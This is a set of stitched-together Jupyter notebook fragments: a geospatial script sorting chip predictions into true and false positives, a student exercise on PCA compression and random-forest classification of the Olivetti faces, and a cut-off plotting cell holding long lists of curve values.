    NOTE(review): the ``count`` dict (granule_count / null_chips) is built
    but never returned or read — dead bookkeeping as written.
    """
    count = {}
    label_match_results = []
    granule_count = len(data.keys())
    granule_list = data.keys()  # unused as written
    count["granule_count"] = granule_count
    for k1 in list(data.keys()):
        for i in range(len(data[k1])):
            # Chips with no prediction at all are tallied as "null chips".
            if len(data[k1][i]['predicted_labels']) == 0:
                if "null_chips" not in count.keys():
                    count["null_chips"] = 1
                else:
                    count["null_chips"] += 1
            for label in data[k1][i]['predicted_labels']:
                if label == label_match:
                    label_match_results.append([k1,data[k1][i]])
    return label_match_results

data_for_gdf = output_for_gdf(data)
data_for_gdf[0][1]["actual_label"]

# Build parallel lists of predicted labels, actual labels, and polygons
# (one entry per matched chip) for the GeoDataFrame below.
predicted_labels = []
actual_labels = []
polygon_list = []
for result in data_for_gdf:
    # Only the first predicted label is kept per chip.
    predicted_labels.append(result[1]["predicted_labels"][0])
    actual_labels.append(result[1]["actual_label"])
    coords = result[1]["polygon_coords"]
    polygon = Polygon(coords)
    polygon_list.append(polygon)

gdf = gpd.GeoDataFrame({"predicted_label":predicted_labels,"actual_label":actual_labels,"geometry":polygon_list})
gdf.shape

# Split into mismatches ("false positives") and matches ("true positives")
# relative to the actual label; keep geometry only, with a fresh index.
false_positive_gdf = gpd.GeoDataFrame(gdf[gdf["predicted_label"] != gdf["actual_label"] ]["geometry"]).reset_index(drop=True)
true_positive_gdf = gpd.GeoDataFrame(gdf[gdf["predicted_label"] == gdf["actual_label"] ]["geometry"]).reset_index(drop=True)
false_positive_gdf.shape
true_positive_gdf.shape

def convert_to_4326(gdf):
    """Tag the frame with its source CRS, then reproject to WGS84 (EPSG:4326).

    NOTE(review): ``epsg=3257`` looks like a typo for 3857 (Web Mercator) —
    confirm the CRS the chip polygons were actually produced in before
    trusting the reprojected coordinates.
    """
    gdf = gdf.set_crs(epsg=3257)
    gdf = gdf.to_crs(epsg=4326)
    return gdf

false_positive_gdf = convert_to_4326(false_positive_gdf)
true_positive_gdf = convert_to_4326(true_positive_gdf)
false_positive_gdf
true_positive_gdf

# Persist both splits as GeoJSON for inspection in GIS tooling.
true_positive_gdf.to_file("true_positive_ISL_labelled.geojson", driver="GeoJSON", index=True)
false_positive_gdf.to_file("false_positive_ISL_labelled.geojson", driver="GeoJSON", index=True)
```
github_jupyter
# КТ-2, группа ПМ-1801
## Кирилл Захаров
```
# TOPIC: image compression.
# Load the Olivetti faces dataset.
from sklearn.datasets import fetch_olivetti_faces
from sklearn.datasets import load_sample_images
from sklearn.decomposition import PCA
from sklearn.model_selection import train_test_split
from sklearn.ensemble import RandomForestClassifier
from sklearn.metrics import classification_report, confusion_matrix
import seaborn as sns
import matplotlib.pyplot as plt
%matplotlib inline
import numpy as np

# 400 x 4096 (40 faces x 10 variants each) flattened from 64x64 images.
dataset = fetch_olivetti_faces()
len(dataset.images)
dataset['data'].shape
dataset['images'].shape
dataset['target'].shape

# Task: apply PCA to compress the images, with 3 choices for the number of
# components — one of them the full set.
```
### n_components = 400
```
pca = PCA(n_components = 400)
data_transformed = pca.fit_transform(dataset['data'])
data_transformed.shape

# Build the train and test splits at random.
# Don't forget the random seed.
X_train, X_test, Y_train, Y_test = train_test_split(data_transformed, dataset['target'], random_state=5)

# For all 3 variants run a classification (method of your choice).
# Compute the quality metrics, plus the number of correctly recognised images.
# Compare the results: number of components, learning time, accuracy_score.
rfc = RandomForestClassifier(n_estimators = 400, max_depth=5)
rfc.fit(X_train, Y_train)
prediction = rfc.predict(X_test)
print(classification_report(Y_test, prediction, zero_division=0))

# Confusion matrix over the 40 identities.
plt.subplots(figsize=(12, 12), dpi=120)
sns.heatmap(confusion_matrix(Y_test, prediction), annot=True, square=True, cmap='mako')
plt.show()

# Show two random faces next to their 400-component PCA encodings
# (400 values rendered as a 20x20 image).
# NOTE(review): randint starts at 1, so image 0 can never be sampled — confirm intended.
indxs = np.random.randint(1, len(dataset['images']), 2)
indxs
plt.imshow(dataset['images'][indxs[0]])
plt.show()
plt.imshow(data_transformed[indxs[0]].reshape(20,20))
plt.show()
plt.imshow(dataset['images'][indxs[1]])
plt.show()
plt.imshow(data_transformed[indxs[1]].reshape(20,20))
plt.show()
```
### n_components = 100
```
pca = PCA(n_components = 100)
data_transformed = pca.fit_transform(dataset['data'])
data_transformed.shape

# Build the train and test splits at random.
# Don't forget the random seed.
X_train, X_test, Y_train, Y_test = train_test_split(data_transformed, dataset['target'], random_state=5)

# For all 3 variants run a classification (method of your choice).
# Compute the quality metrics, plus the number of correctly recognised images.
# Compare the results: number of components, learning time, accuracy_score.
rfc = RandomForestClassifier(n_estimators = 400, max_depth=5)
rfc.fit(X_train, Y_train)
prediction = rfc.predict(X_test)
print(classification_report(Y_test, prediction, zero_division=0))

# Two random faces next to their 100-component encodings (10x10 image).
indxs = np.random.randint(1, len(dataset['images']), 2)
indxs
plt.imshow(dataset['images'][indxs[0]])
plt.show()
plt.imshow(data_transformed[indxs[0]].reshape(10,10))
plt.show()
plt.imshow(dataset['images'][indxs[1]])
plt.show()
plt.imshow(data_transformed[indxs[1]].reshape(10,10))
plt.show()
```
## без сжатия
```
# Baseline: classify the raw 4096-dimensional pixels, no PCA.
X_train, X_test, Y_train, Y_test = train_test_split(dataset['data'], dataset['target'], random_state=5)
rfc = RandomForestClassifier(n_estimators = 400, max_depth=5)
rfc.fit(X_train, Y_train)
prediction1 = rfc.predict(X_test)
print(classification_report(Y_test, prediction1, zero_division=0))
```
#### При сжатие точность класиификации составила 0.65, а без сжатия 0.63. Также при сжатии лучше макро-среднее по recall, что говорит о более точной классификации, то есть мы меньше ошибаемся в ошибках первого рода.
github_jupyter
``` import numpy as np import matplotlib import matplotlib.pyplot as plt # model 1 on suzhou and swiss x1, y1 = [0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.004201680672268907, 0.004201680672268907, 0.004201680672268907, 0.004201680672268907, 0.004201680672268907, 0.004201680672268907, 0.004201680672268907, 0.004201680672268907, 0.004201680672268907, 0.004201680672268907, 0.004201680672268907, 0.004201680672268907, 0.004201680672268907, 0.004201680672268907, 0.004201680672268907, 0.008403361344537815, 0.008403361344537815, 0.008403361344537815, 0.012605042016806723, 0.012605042016806723, 0.012605042016806723, 0.01680672268907563, 0.02100840336134454, 0.025210084033613446, 0.025210084033613446, 0.025210084033613446, 0.025210084033613446, 0.025210084033613446, 0.025210084033613446, 0.025210084033613446, 0.025210084033613446, 0.025210084033613446, 0.025210084033613446, 0.029411764705882353, 0.037815126050420166, 0.037815126050420166, 0.037815126050420166, 0.037815126050420166, 0.04201680672268908, 0.046218487394957986, 0.046218487394957986, 0.0546218487394958, 0.0546218487394958, 0.058823529411764705, 0.058823529411764705, 0.06722689075630252, 0.07142857142857142, 0.07563025210084033, 0.07983193277310924, 0.08403361344537816, 0.09243697478991597, 0.10084033613445378, 0.10504201680672269, 0.10504201680672269, 0.1092436974789916, 0.1134453781512605, 0.11764705882352941, 0.11764705882352941, 
0.12605042016806722, 0.13025210084033614, 0.13865546218487396, 0.14285714285714285, 0.14285714285714285, 0.14705882352941177, 0.14705882352941177, 0.15126050420168066, 0.15546218487394958, 0.15546218487394958, 0.1638655462184874, 0.1638655462184874, 0.1638655462184874, 0.1722689075630252, 0.18067226890756302, 0.19327731092436976, 0.20168067226890757, 0.20588235294117646, 0.21008403361344538, 0.2184873949579832, 0.22268907563025211, 0.22268907563025211, 0.23949579831932774, 0.25210084033613445, 0.2647058823529412, 0.2647058823529412, 0.2773109243697479, 0.2773109243697479, 0.2857142857142857, 0.28991596638655465, 0.29831932773109243, 0.3067226890756303, 0.31092436974789917, 0.31512605042016806, 0.31512605042016806, 0.31932773109243695, 0.31932773109243695, 0.3277310924369748, 0.3319327731092437, 0.33613445378151263, 0.3403361344537815, 0.35294117647058826, 0.36134453781512604, 0.36554621848739494, 0.3739495798319328, 0.37815126050420167, 0.37815126050420167, 0.37815126050420167, 0.38235294117647056, 0.38235294117647056, 0.3865546218487395, 0.3865546218487395, 0.3907563025210084, 0.3949579831932773, 0.3949579831932773, 0.39915966386554624, 0.40756302521008403, 0.41596638655462187, 0.42016806722689076, 0.42436974789915966, 0.42857142857142855, 0.4369747899159664, 0.44537815126050423, 0.453781512605042, 0.4579831932773109, 0.46218487394957986, 0.47478991596638653, 0.4789915966386555, 0.4957983193277311, 0.5084033613445378, 0.5168067226890757, 0.5210084033613446, 0.5252100840336135, 0.542016806722689, 0.5462184873949579, 0.5504201680672269, 0.5588235294117647, 0.5714285714285714, 0.5714285714285714, 0.5882352941176471, 0.5966386554621849, 0.6008403361344538, 0.6008403361344538, 0.6008403361344538, 0.6008403361344538, 0.6092436974789915, 0.6092436974789915, 0.6092436974789915, 0.6134453781512605, 0.6218487394957983, 0.6260504201680672, 0.6302521008403361, 0.6386554621848739, 0.6554621848739496, 0.6596638655462185, 0.6722689075630253, 0.6764705882352942, 
0.680672268907563, 0.6890756302521008, 0.6890756302521008, 0.6932773109243697, 0.6974789915966386, 0.6974789915966386, 0.7058823529411765, 0.7100840336134454, 0.7226890756302521, 0.7310924369747899, 0.7352941176470589, 0.7394957983193278, 0.7394957983193278, 0.7521008403361344, 0.7521008403361344, 0.7563025210084033, 0.7605042016806722, 0.7647058823529411, 0.7773109243697479, 0.7815126050420168, 0.7857142857142857, 0.7899159663865546, 0.7983193277310925, 0.8067226890756303, 0.8067226890756303, 0.8067226890756303, 0.8109243697478992, 0.8235294117647058, 0.8361344537815126, 0.8403361344537815, 0.8445378151260504, 0.8487394957983193, 0.8529411764705882, 0.8571428571428571, 0.8697478991596639, 0.8697478991596639, 0.8697478991596639, 0.8739495798319328, 0.8781512605042017, 0.8823529411764706, 0.8865546218487395, 0.8949579831932774, 0.8949579831932774, 0.8991596638655462, 0.9033613445378151, 0.907563025210084, 0.9117647058823529, 0.9117647058823529, 0.9117647058823529, 0.9159663865546218, 0.9201680672268907, 0.9243697478991597, 0.9285714285714286, 0.9285714285714286, 0.9285714285714286, 0.9327731092436975, 0.9327731092436975, 0.9327731092436975, 0.9369747899159664, 0.9453781512605042, 0.9453781512605042, 0.9495798319327731, 0.9537815126050421, 0.9537815126050421, 0.9537815126050421, 0.957983193277311, 0.957983193277311, 0.957983193277311, 0.957983193277311, 0.9621848739495799, 0.9621848739495799, 0.9621848739495799, 0.9663865546218487, 0.9747899159663865, 0.9789915966386554, 0.9789915966386554, 0.9789915966386554, 0.9789915966386554, 0.9789915966386554, 0.9789915966386554, 0.9789915966386554, 0.9789915966386554, 0.9789915966386554, 0.9789915966386554, 0.9789915966386554, 0.9789915966386554, 0.9789915966386554, 0.9789915966386554, 0.9831932773109243, 0.9831932773109243, 0.9831932773109243, 0.9831932773109243, 0.9831932773109243, 0.9831932773109243, 0.9831932773109243, 0.9831932773109243, 0.9831932773109243, 0.9831932773109243, 0.9831932773109243, 0.9831932773109243, 
0.9831932773109243, 0.9831932773109243, 0.9831932773109243, 0.9831932773109243, 0.9831932773109243, 0.9831932773109243, 0.9831932773109243, 0.9831932773109243, 0.9831932773109243, 0.9831932773109243, 0.9831932773109243, 0.9831932773109243, 0.9831932773109243, 0.9831932773109243, 0.9831932773109243, 0.9831932773109243, 0.9831932773109243, 0.9831932773109243, 0.9831932773109243, 0.9831932773109243, 0.9831932773109243, 0.9831932773109243, 0.9831932773109243, 0.9831932773109243, 0.9831932773109243, 0.9831932773109243, 0.9831932773109243, 0.9831932773109243, 0.9831932773109243, 0.9831932773109243, 0.9831932773109243, 0.9831932773109243, 0.9831932773109243, 0.9831932773109243, 0.9831932773109243, 0.9831932773109243, 0.9831932773109243, 0.9831932773109243, 0.9831932773109243, 0.9831932773109243, 0.9831932773109243, 0.9831932773109243, 0.9831932773109243, 0.9831932773109243, 0.9831932773109243, 0.9831932773109243, 0.9831932773109243, 0.9831932773109243, 0.9831932773109243, 0.9831932773109243, 0.9831932773109243, 0.9831932773109243, 0.9831932773109243, 0.9831932773109243, 0.9831932773109243, 0.9873949579831933, 0.9873949579831933, 0.9873949579831933, 0.9873949579831933, 0.9873949579831933, 0.9873949579831933, 0.9873949579831933, 0.9873949579831933, 0.9873949579831933, 0.9873949579831933, 0.9873949579831933, 0.9915966386554622, 0.9915966386554622, 0.9915966386554622, 0.9915966386554622, 0.9915966386554622, 0.9915966386554622, 0.9915966386554622, 0.9915966386554622, 0.9915966386554622, 0.9915966386554622, 0.9915966386554622, 0.9915966386554622, 0.9915966386554622, 0.9915966386554622, 0.9915966386554622, 0.9915966386554622, 0.9915966386554622, 0.9915966386554622, 0.9915966386554622, 0.9915966386554622, 0.9915966386554622, 0.9915966386554622, 0.9915966386554622, 0.9915966386554622, 0.9915966386554622, 0.9915966386554622, 0.9915966386554622, 0.9915966386554622, 0.9915966386554622, 0.9915966386554622, 0.9915966386554622, 0.9915966386554622, 0.9915966386554622, 0.9915966386554622, 
0.9915966386554622, 0.9915966386554622, 0.9915966386554622, 0.9915966386554622, 0.9915966386554622, 0.9915966386554622, 0.9915966386554622, 0.9915966386554622, 0.9915966386554622, 0.9915966386554622, 0.9915966386554622, 0.9915966386554622, 0.9915966386554622, 0.9915966386554622, 0.9915966386554622, 0.9915966386554622, 0.9915966386554622, 0.9915966386554622, 0.9915966386554622, 0.9915966386554622, 0.9915966386554622, 0.9915966386554622, 0.9915966386554622, 0.9915966386554622, 0.9915966386554622, 0.9915966386554622, 0.9915966386554622, 0.9915966386554622, 0.9915966386554622, 0.9915966386554622, 0.9915966386554622, 0.9915966386554622, 0.9915966386554622, 0.9915966386554622, 0.9915966386554622, 0.9915966386554622, 0.9915966386554622, 0.9915966386554622, 0.9915966386554622, 0.9915966386554622, 0.9915966386554622, 0.9915966386554622, 0.9915966386554622, 0.9915966386554622, 0.9915966386554622, 0.9915966386554622, 0.9915966386554622, 0.9915966386554622, 0.9915966386554622, 0.9915966386554622, 0.9915966386554622, 0.9915966386554622, 0.9915966386554622, 0.9915966386554622, 0.9915966386554622, 0.9915966386554622, 0.9915966386554622, 0.9915966386554622, 0.9915966386554622, 0.9915966386554622, 0.9915966386554622, 0.9915966386554622, 0.9915966386554622, 0.9915966386554622, 0.9915966386554622, 0.9915966386554622, 0.9915966386554622, 0.9915966386554622, 0.9915966386554622, 0.9915966386554622, 0.9915966386554622, 0.9915966386554622, 0.9915966386554622, 0.9915966386554622, 0.9915966386554622, 0.9915966386554622, 0.9915966386554622, 0.9915966386554622, 0.9915966386554622, 0.9915966386554622, 0.9915966386554622, 0.9915966386554622, 0.9915966386554622, 0.9915966386554622, 0.9915966386554622, 0.9915966386554622, 0.9915966386554622, 0.9915966386554622, 0.9915966386554622, 0.9915966386554622, 0.9915966386554622, 0.9915966386554622, 0.9915966386554622, 0.9915966386554622, 0.9915966386554622, 0.9915966386554622, 0.9957983193277311, 0.9957983193277311, 0.9957983193277311, 0.9957983193277311, 
0.9957983193277311, 0.9957983193277311, 0.9957983193277311, 0.9957983193277311, 0.9957983193277311, 0.9957983193277311, 0.9957983193277311, 0.9957983193277311, 0.9957983193277311, 0.9957983193277311, 0.9957983193277311, 0.9957983193277311, 0.9957983193277311, 0.9957983193277311, 0.9957983193277311, 0.9957983193277311, 0.9957983193277311, 0.9957983193277311, 0.9957983193277311, 0.9957983193277311, 0.9957983193277311, 0.9957983193277311, 0.9957983193277311, 0.9957983193277311, 0.9957983193277311, 0.9957983193277311, 0.9957983193277311, 0.9957983193277311, 0.9957983193277311, 0.9957983193277311, 0.9957983193277311, 0.9957983193277311, 0.9957983193277311, 0.9957983193277311, 0.9957983193277311, 0.9957983193277311, 0.9957983193277311, 0.9957983193277311, 0.9957983193277311, 0.9957983193277311, 0.9957983193277311, 0.9957983193277311, 0.9957983193277311, 0.9957983193277311, 0.9957983193277311, 0.9957983193277311, 0.9957983193277311, 0.9957983193277311, 0.9957983193277311, 0.9957983193277311, 0.9957983193277311, 0.9957983193277311, 0.9957983193277311, 0.9957983193277311, 0.9957983193277311, 0.9957983193277311, 0.9957983193277311, 0.9957983193277311, 0.9957983193277311, 0.9957983193277311, 0.9957983193277311, 0.9957983193277311, 0.9957983193277311, 0.9957983193277311, 0.9957983193277311, 0.9957983193277311, 0.9957983193277311, 0.9957983193277311, 0.9957983193277311, 0.9957983193277311, 0.9957983193277311, 0.9957983193277311, 0.9957983193277311, 0.9957983193277311, 0.9957983193277311, 0.9957983193277311, 0.9957983193277311, 0.9957983193277311, 0.9957983193277311, 0.9957983193277311, 0.9957983193277311, 0.9957983193277311, 0.9957983193277311, 0.9957983193277311, 0.9957983193277311, 0.9957983193277311, 0.9957983193277311, 0.9957983193277311, 0.9957983193277311, 0.9957983193277311, 0.9957983193277311, 0.9957983193277311, 0.9957983193277311, 0.9957983193277311, 0.9957983193277311, 0.9957983193277311, 0.9957983193277311, 0.9957983193277311, 0.9957983193277311, 0.9957983193277311, 
0.9957983193277311, 0.9957983193277311, 0.9957983193277311, 0.9957983193277311, 0.9957983193277311, 0.9957983193277311, 0.9957983193277311, 0.9957983193277311, 0.9957983193277311, 0.9957983193277311, 0.9957983193277311, 0.9957983193277311, 0.9957983193277311, 0.9957983193277311, 0.9957983193277311, 0.9957983193277311, 0.9957983193277311, 0.9957983193277311, 0.9957983193277311, 0.9957983193277311, 0.9957983193277311, 0.9957983193277311, 0.9957983193277311, 0.9957983193277311, 0.9957983193277311, 0.9957983193277311, 0.9957983193277311, 0.9957983193277311, 0.9957983193277311, 0.9957983193277311, 0.9957983193277311, 0.9957983193277311, 0.9957983193277311, 0.9957983193277311, 0.9957983193277311, 0.9957983193277311, 0.9957983193277311, 0.9957983193277311, 0.9957983193277311, 0.9957983193277311, 0.9957983193277311, 0.9957983193277311, 0.9957983193277311, 0.9957983193277311, 0.9957983193277311, 0.9957983193277311, 0.9957983193277311, 0.9957983193277311, 0.9957983193277311, 0.9957983193277311, 0.9957983193277311, 0.9957983193277311, 0.9957983193277311, 0.9957983193277311, 0.9957983193277311, 0.9957983193277311, 0.9957983193277311, 0.9957983193277311, 0.9957983193277311, 0.9957983193277311, 0.9957983193277311, 0.9957983193277311, 0.9957983193277311, 1] , [0, 0.0, 0.004201680672268907, 0.004201680672268907, 0.004201680672268907, 0.004201680672268907, 0.004201680672268907, 0.004201680672268907, 0.004201680672268907, 0.008403361344537815, 0.008403361344537815, 0.008403361344537815, 0.008403361344537815, 0.008403361344537815, 0.008403361344537815, 0.008403361344537815, 0.008403361344537815, 0.008403361344537815, 0.008403361344537815, 0.008403361344537815, 0.008403361344537815, 0.008403361344537815, 0.008403361344537815, 0.008403361344537815, 0.008403361344537815, 0.008403361344537815, 0.008403361344537815, 0.008403361344537815, 0.008403361344537815, 0.008403361344537815, 0.008403361344537815, 0.008403361344537815, 0.008403361344537815, 0.008403361344537815, 0.008403361344537815, 
0.008403361344537815, 0.008403361344537815, 0.008403361344537815, 0.008403361344537815, 0.008403361344537815, 0.008403361344537815, 0.008403361344537815, 0.008403361344537815, 0.008403361344537815, 0.008403361344537815, 0.008403361344537815, 0.008403361344537815, 0.008403361344537815, 0.008403361344537815, 0.008403361344537815, 0.008403361344537815, 0.012605042016806723, 0.012605042016806723, 0.012605042016806723, 0.012605042016806723, 0.01680672268907563, 0.01680672268907563, 0.01680672268907563, 0.01680672268907563, 0.01680672268907563, 0.01680672268907563, 0.025210084033613446, 0.025210084033613446, 0.025210084033613446, 0.025210084033613446, 0.025210084033613446, 0.025210084033613446, 0.025210084033613446, 0.025210084033613446, 0.025210084033613446, 0.029411764705882353, 0.029411764705882353, 0.029411764705882353, 0.029411764705882353, 0.03361344537815126, 0.03361344537815126, 0.03361344537815126, 0.03361344537815126, 0.03361344537815126, 0.03361344537815126, 0.03361344537815126, 0.037815126050420166, 0.037815126050420166, 0.04201680672268908, 0.046218487394957986, 0.046218487394957986, 0.046218487394957986, 0.0546218487394958, 0.0546218487394958, 0.0546218487394958, 0.0546218487394958, 0.0546218487394958, 0.058823529411764705, 0.058823529411764705, 0.058823529411764705, 0.06302521008403361, 0.06302521008403361, 0.06302521008403361, 0.06722689075630252, 0.06722689075630252, 0.07142857142857142, 0.07142857142857142, 0.07142857142857142, 0.07142857142857142, 0.07983193277310924, 0.07983193277310924, 0.08403361344537816, 0.09243697478991597, 0.09243697478991597, 0.09663865546218488, 0.09663865546218488, 0.09663865546218488, 0.09663865546218488, 0.10504201680672269, 0.11764705882352941, 0.11764705882352941, 0.13025210084033614, 0.13865546218487396, 0.13865546218487396, 0.14705882352941177, 0.15546218487394958, 0.1638655462184874, 0.1722689075630252, 0.18067226890756302, 0.18487394957983194, 0.18907563025210083, 0.21008403361344538, 0.2184873949579832, 
0.2184873949579832, 0.23109243697478993, 0.23949579831932774, 0.24369747899159663, 0.25210084033613445, 0.25630252100840334, 0.2605042016806723, 0.2647058823529412, 0.2689075630252101, 0.2773109243697479, 0.2773109243697479, 0.2773109243697479, 0.2815126050420168, 0.28991596638655465, 0.28991596638655465, 0.28991596638655465, 0.29411764705882354, 0.3067226890756303, 0.3067226890756303, 0.3067226890756303, 0.31092436974789917, 0.31512605042016806, 0.31932773109243695, 0.3235294117647059, 0.3277310924369748, 0.3319327731092437, 0.33613445378151263, 0.3403361344537815, 0.3445378151260504, 0.3487394957983193, 0.35714285714285715, 0.36134453781512604, 0.36554621848739494, 0.3865546218487395, 0.3949579831932773, 0.40336134453781514, 0.40756302521008403, 0.40756302521008403, 0.41596638655462187, 0.41596638655462187, 0.41596638655462187, 0.42016806722689076, 0.4411764705882353, 0.44537815126050423, 0.4495798319327731, 0.453781512605042, 0.46218487394957986, 0.47478991596638653, 0.4831932773109244, 0.4957983193277311, 0.4957983193277311, 0.5, 0.5042016806722689, 0.5126050420168067, 0.5168067226890757, 0.5294117647058824, 0.5378151260504201, 0.5378151260504201, 0.5378151260504201, 0.5378151260504201, 0.5378151260504201, 0.5504201680672269, 0.5504201680672269, 0.5588235294117647, 0.5672268907563025, 0.5672268907563025, 0.5672268907563025, 0.5756302521008403, 0.5798319327731093, 0.5840336134453782, 0.592436974789916, 0.592436974789916, 0.592436974789916, 0.5966386554621849, 0.6008403361344538, 0.6092436974789915, 0.6176470588235294, 0.6176470588235294, 0.6176470588235294, 0.6260504201680672, 0.6260504201680672, 0.6260504201680672, 0.6302521008403361, 0.6428571428571429, 0.6470588235294118, 0.6512605042016807, 0.6596638655462185, 0.6638655462184874, 0.6680672268907563, 0.6722689075630253, 0.6764705882352942, 0.6890756302521008, 0.6890756302521008, 0.6932773109243697, 0.6932773109243697, 0.6974789915966386, 0.7058823529411765, 0.7100840336134454, 0.7100840336134454, 
0.7184873949579832, 0.7226890756302521, 0.7226890756302521, 0.7226890756302521, 0.7226890756302521, 0.7310924369747899, 0.7310924369747899, 0.7394957983193278, 0.7436974789915967, 0.7436974789915967, 0.7436974789915967, 0.7436974789915967, 0.7436974789915967, 0.7521008403361344, 0.7605042016806722, 0.7647058823529411, 0.7689075630252101, 0.773109243697479, 0.773109243697479, 0.773109243697479, 0.773109243697479, 0.773109243697479, 0.7773109243697479, 0.7815126050420168, 0.7857142857142857, 0.7899159663865546, 0.7983193277310925, 0.7983193277310925, 0.7983193277310925, 0.8067226890756303, 0.8067226890756303, 0.8067226890756303, 0.8109243697478992, 0.8109243697478992, 0.819327731092437, 0.8277310924369747, 0.8361344537815126, 0.8361344537815126, 0.8403361344537815, 0.8487394957983193, 0.8529411764705882, 0.8529411764705882, 0.8613445378151261, 0.8613445378151261, 0.8613445378151261, 0.8613445378151261, 0.865546218487395, 0.865546218487395, 0.865546218487395, 0.865546218487395, 0.865546218487395, 0.865546218487395, 0.8739495798319328, 0.8781512605042017, 0.8823529411764706, 0.8823529411764706, 0.8823529411764706, 0.8823529411764706, 0.8823529411764706, 0.8991596638655462, 0.9033613445378151, 0.9033613445378151, 0.9033613445378151, 0.9117647058823529, 0.9117647058823529, 0.9159663865546218, 0.9159663865546218, 0.9201680672268907, 0.9243697478991597, 0.9285714285714286, 0.9327731092436975, 0.9327731092436975, 0.9327731092436975, 0.9327731092436975, 0.9411764705882353, 0.9411764705882353, 0.9411764705882353, 0.9411764705882353, 0.9411764705882353, 0.9411764705882353, 0.9411764705882353, 0.9537815126050421, 0.9537815126050421, 0.9537815126050421, 0.9537815126050421, 0.9537815126050421, 0.9537815126050421, 0.9537815126050421, 0.9537815126050421, 0.9537815126050421, 0.9537815126050421, 0.9537815126050421, 0.9537815126050421, 0.9537815126050421, 0.9537815126050421, 0.9537815126050421, 0.9537815126050421, 0.957983193277311, 0.957983193277311, 0.9621848739495799, 
0.9621848739495799, 0.9621848739495799, 0.9621848739495799, 0.9621848739495799, 0.9621848739495799, 0.9621848739495799, 0.9621848739495799, 0.9663865546218487, 0.9663865546218487, 0.9663865546218487, 0.9663865546218487, 0.9663865546218487, 0.9663865546218487, 0.9663865546218487, 0.9663865546218487, 0.9663865546218487, 0.9705882352941176, 0.9747899159663865, 0.9747899159663865, 0.9747899159663865, 0.9747899159663865, 0.9747899159663865, 0.9747899159663865, 0.9747899159663865, 0.9747899159663865, 0.9747899159663865, 0.9747899159663865, 0.9747899159663865, 0.9747899159663865, 0.9747899159663865, 0.9747899159663865, 0.9747899159663865, 0.9747899159663865, 0.9747899159663865, 0.9831932773109243, 0.9831932773109243, 0.9831932773109243, 0.9831932773109243, 0.9831932773109243, 0.9831932773109243, 0.9831932773109243, 0.9831932773109243, 0.9831932773109243, 0.9831932773109243, 0.9831932773109243, 0.9831932773109243, 0.9831932773109243, 0.9831932773109243, 0.9831932773109243, 0.9831932773109243, 0.9831932773109243, 0.9831932773109243, 0.9831932773109243, 0.9831932773109243, 0.9831932773109243, 0.9831932773109243, 0.9831932773109243, 0.9831932773109243, 0.9831932773109243, 0.9831932773109243, 0.9831932773109243, 0.9831932773109243, 0.9831932773109243, 0.9831932773109243, 0.9831932773109243, 0.9831932773109243, 0.9831932773109243, 0.9831932773109243, 0.9831932773109243, 0.9831932773109243, 0.9873949579831933, 0.9873949579831933, 0.9873949579831933, 0.9873949579831933, 0.9873949579831933, 0.9873949579831933, 0.9873949579831933, 0.9873949579831933, 0.9873949579831933, 0.9873949579831933, 0.9873949579831933, 0.9873949579831933, 0.9873949579831933, 0.9873949579831933, 0.9873949579831933, 0.9873949579831933, 0.9873949579831933, 0.9873949579831933, 0.9873949579831933, 0.9873949579831933, 0.9873949579831933, 0.9873949579831933, 0.9873949579831933, 0.9873949579831933, 0.9873949579831933, 0.9873949579831933, 0.9873949579831933, 0.9873949579831933, 0.9873949579831933, 0.9873949579831933, 
0.9873949579831933, 0.9873949579831933, 0.9873949579831933, 0.9873949579831933, 0.9873949579831933, 0.9873949579831933, 0.9873949579831933, 0.9873949579831933, 0.9873949579831933, 0.9873949579831933, 0.9873949579831933, 0.9915966386554622, 0.9915966386554622, 0.9915966386554622, 0.9915966386554622, 0.9915966386554622, 0.9915966386554622, 0.9915966386554622, 0.9915966386554622, 0.9915966386554622, 0.9915966386554622, 0.9915966386554622, 0.9915966386554622, 0.9915966386554622, 0.9915966386554622, 0.9915966386554622, 0.9915966386554622, 0.9915966386554622, 0.9915966386554622, 0.9915966386554622, 0.9915966386554622, 0.9915966386554622, 0.9915966386554622, 0.9915966386554622, 0.9915966386554622, 0.9915966386554622, 0.9915966386554622, 0.9915966386554622, 0.9915966386554622, 0.9915966386554622, 0.9915966386554622, 0.9915966386554622, 0.9915966386554622, 0.9915966386554622, 0.9915966386554622, 0.9915966386554622, 0.9915966386554622, 0.9915966386554622, 0.9915966386554622, 0.9915966386554622, 0.9915966386554622, 0.9915966386554622, 0.9915966386554622, 0.9915966386554622, 0.9915966386554622, 0.9915966386554622, 0.9915966386554622, 0.9915966386554622, 0.9915966386554622, 0.9915966386554622, 0.9915966386554622, 0.9915966386554622, 0.9915966386554622, 0.9915966386554622, 0.9915966386554622, 0.9915966386554622, 0.9915966386554622, 0.9915966386554622, 0.9915966386554622, 0.9915966386554622, 0.9915966386554622, 0.9915966386554622, 0.9915966386554622, 0.9915966386554622, 0.9915966386554622, 0.9915966386554622, 0.9915966386554622, 0.9915966386554622, 0.9915966386554622, 0.9915966386554622, 0.9915966386554622, 0.9915966386554622, 0.9915966386554622, 0.9915966386554622, 0.9915966386554622, 0.9915966386554622, 0.9915966386554622, 0.9915966386554622, 0.9915966386554622, 0.9915966386554622, 0.9915966386554622, 0.9915966386554622, 0.9915966386554622, 0.9915966386554622, 0.9915966386554622, 0.9915966386554622, 0.9915966386554622, 0.9915966386554622, 0.9915966386554622, 0.9915966386554622, 
